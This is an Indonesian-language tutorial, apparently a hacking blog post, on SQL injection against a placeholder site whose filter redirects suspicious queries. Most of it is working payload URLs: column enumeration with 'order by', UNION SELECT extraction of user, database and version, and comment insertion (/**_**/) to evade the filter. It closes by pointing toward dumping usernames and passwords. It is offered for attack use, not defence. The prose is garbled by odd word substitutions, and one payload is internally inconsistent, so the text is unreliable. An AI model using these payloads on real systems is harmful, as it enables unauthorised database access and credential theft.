Bypassing Sql Injection Redirect
Mungkin kalian ketika ini sedang mengalami hal ibarat ini? Oke mari kita selesaikan problemnya.
Ok lanjut.
Gw udah punya sasaran contoh,
http://site.com/index.php?id=6
Lanjut menginjeksinya.
Sekarang kita akan mencari berapa jumlah column datasbase site tersebut dengan menambahkan perintah order by, tambahkan tanda + untuk spasi. Kaprikornus perintah lengkapnya ibarat ini
http://site.com/index.php?id=6+order+by+1-- -
Tapi disini gw ketika menambahkan perintah order+by malah site ke redirect. Oke kita bypass ibarat ini,
order/**_**/by 1-- - [bypass done]
Setelah bypass berhasil, kemudian ganti angka 1 ke angka 2 dan seterusnya hingga menemukan error.
Disini gw menemukan errornya diangka ke 5, berarti jumlah column database ada 4.
Lanjut.
Sekarang masukan perintah union select, ganti order+by dengan union+select+1,2,3,4-- - dan sebelum angka dibelakang url tersebut tambahkan tanda -
Kaprikornus perintah lengkapnya seperi ini,
http://site.com/index.php?id=-6+union+select+1,2,3,4-- -
Lagi-lagi sehabis menganti perintah order+by ke perintah union+select site ke redirect, hmmm mari kita bypass
union/**_**/select 1,2,3,4-- - [bypass done]
Setelah bypass sukses, maka nanti akan mendapat sebuah angka, dan gw disini sanggup angka 2.
Lanjut.
Sekarang coba kita lihat user, database, dan version site tersebut, dengan perintah ibarat berikut ini
http://site.com/index.php?id=-6 union/**_**/select 1,user(),0x3a,database(),0x3a,version(),3,4-- -
Hmm ternyata kena redirect lagi, kita bypass lagi ibarat berikut ini
user/**_**/(),database/**_**/(),version/**_**/() [bypass done]
Selanjutnya tinggal didump username dan passwordnya.
Sekian dari gw dan agar bermanfaat.
